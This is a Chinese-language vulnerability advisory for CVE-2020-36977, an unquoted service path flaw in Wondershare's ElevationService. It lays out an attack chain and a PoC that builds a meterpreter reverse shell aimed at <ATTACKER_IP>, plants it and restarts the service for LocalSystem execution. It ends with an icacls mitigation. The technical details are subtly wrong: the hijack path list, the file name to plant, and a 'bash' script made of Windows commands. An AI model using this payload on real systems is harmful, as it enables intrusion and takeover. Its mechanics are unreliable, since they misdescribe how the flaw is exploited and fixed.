CVE-2020-36977: Wondershare Driver Install Service 未引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2020-36977

漏洞类型

未引号服务路径漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wondershare Driver Install Service (ElevationService)

漏洞概述

CVE-2020-36977是万兴科技（Wondershare）Driver Install Service中的一个高危本地权限提升漏洞。该漏洞存在于ElevationService可执行文件中，由于服务路径未使用引号包裹，存在路径劫持风险。攻击者可以利用Windows服务解析路径时的特性，在服务路径的中间目录中植入恶意可执行文件。当服务重启或系统启动时，服务会按照路径顺序查找并执行第一个匹配的可执行文件，攻击者精心构造的恶意程序将优先于合法服务被加载，从而以LocalSystem高权限身份执行任意代码，实现完整的系统权限提升。此漏洞CVSS评分7.8，属于高危级别，攻击向量为本地攻击，需要低权限认证，无需用户交互即可完成利用。由于该服务通常随Wondershare产品安装而自动配置，且具有自动启动特性，因此具有较高的实际威胁价值。

技术细节

未引号服务路径漏洞（Unquoted Service Path）是一种经典的Windows权限提升技术。当Windows服务配置的可执行文件路径包含空格且未使用引号包裹时，服务控制管理器（SCM）在解析路径时会从左到右依次查找匹配的可执行文件。以路径「C:\Program Files\Wondershare\Driver Service\ElevationService.exe」为例，系统会依次尝试查找并执行：C:\Program.exe、C:\Program Files\Driver.exe、C:\Program Files\Wondershare\Driver.exe、C:\Program Files\Wondershare\Driver Service\ElevationService.exe。攻击者只需在任意中间路径创建一个恶意的ElevationService.exe文件，当服务重启时，该恶意程序将以服务配置的高权限（LocalSystem）被加载执行。本漏洞影响Wondershare Driver Install Service的ElevationService.exe，攻击者可通过文件系统访问（如普通用户权限）将恶意可执行文件写入「C:\Program Files\Wondershare\Driver」目录，等待服务重启或通过sc命令手动重启服务即可触发漏洞利用。

攻击链分析

STEP 1

步骤1

信息收集：使用sc qc命令查询ElevationService服务配置，获取未引号的可执行文件路径

STEP 2

步骤2

权限检查：验证当前用户对目标路径（如C:\Program Files\Wondershare\Driver）是否具有写入权限

STEP 3

步骤3

生成恶意代码：使用msfvenom等工具生成具有系统权限执行能力的恶意可执行文件（如反弹shell、添加管理员账户等）

STEP 4

步骤4

植入Payload：将恶意ElevationService.exe文件写入未引号路径的中间目录（C:\Program Files\Wondershare\Driver\ElevationService.exe）

STEP 5

步骤5

触发执行：等待系统重启或使用sc stop/start命令重启ElevationService服务，触发恶意程序以LocalSystem权限执行

STEP 6

步骤6

权限维持：完成权限提升后，可建立后门、持久化控制或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash # CVE-2020-36977 PoC - Unquoted Service Path Privilege Escalation # Target: Wondershare Driver Install Service (ElevationService) # Author: [email protected] # Check if vulnerable service exists sc query ElevationService 2>/dev/null # Get service executable path sc qc ElevationService # Create malicious executable in unquoted path # Attacker places payload at: C:\Program Files\Wondershare\Driver\ElevationService.exe PAYLOAD_PATH="C:\\Program Files\\Wondershare\\Driver\\ElevationService.exe" # Generate malicious DLL/payload (example: reverse shell) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f exe -o "$PAYLOAD_PATH" # Wait for service restart or trigger manually # Option 1: Wait for system restart # Option 2: Trigger service restart sc stop ElevationService sc start ElevationService # Alternative: Use icacls to verify permissions icacls "C:\Program Files\Wondershare\Driver"

影响范围

Wondershare Driver Install Service < 修复版本

Wondershare Driver Install Service ElevationService.exe（所有未打补丁版本）

防御指南

临时缓解措施

立即限制受影响目录的写入权限，使用命令「icacls "C:\Program Files\Wondershare\Driver" /inheritance:r /deny "Everyone:(OI)(CI)(W)"」移除所有用户的写入权限。同时联系Wondershare官方获取安全更新，或考虑暂时禁用ElevationService服务直至完成修复。